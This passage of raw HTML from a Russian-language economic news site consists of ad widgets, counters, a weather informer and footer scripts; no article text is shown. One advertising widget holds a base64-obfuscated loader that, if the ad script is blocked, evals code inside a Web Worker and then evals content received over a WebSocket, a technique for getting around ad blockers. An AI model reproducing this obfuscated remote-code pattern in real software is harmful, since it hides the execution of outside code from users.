id='go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570' data-sender='go2net'></div><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.display('go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570');});</script><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div></br><div id="MIXADV_7463" class="MIXADVERT_NET"></div><script type="text/javascript" src="https://m.mixadvert.com/show/?id=7463" async></script><br><div><a href="https://enovosty.com/ekonomika/full/2209-byudzhet-2021-proekt-novyj-no-vse-po-staromu-chem-zakroyut-diry-v-budzhete" target="_blank" rel="noreferrer noopener"><img alt="лира" src="/wp-content/uploads/2020/09/Budzhet.jpg"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/category/3/ " target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div><br> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><br><br><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></br><a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4820262"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4820262","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='//imasdk.googleapis.com/js/sdkloader/ima3.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/video.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ads.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "7a56e9eaae";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div class="container"><div id="div-gpt-ad-1595961600637-0"><script>catfish('div-gpt-ad-1595961600637-0')
</script></div></div><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script type="text/javascript" src="https://affiliate.ria.com/js/ria_informer.js?riacode=e77f01cd5a912b7be06984da8aae869f" ></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script><script>var player = videojs('my-player', {responsive: true
});

</script><script type="text/javascript">if (typeof window._tx === "undefined") {var s = document.createElement("script");s.type = "text/javascript";s.async = true;s.src = "//st.hbrd.io/ssp.js";
(document.getElementsByTagName("head")[0] ||
document.getElementsByTagName("body")[0]).appendChild(s);}window._tx = window._tx || {};window._tx.cmds = window._tx.cmds || [];window._tx.cmds.push(function () {window._tx.init();});</script></body></html>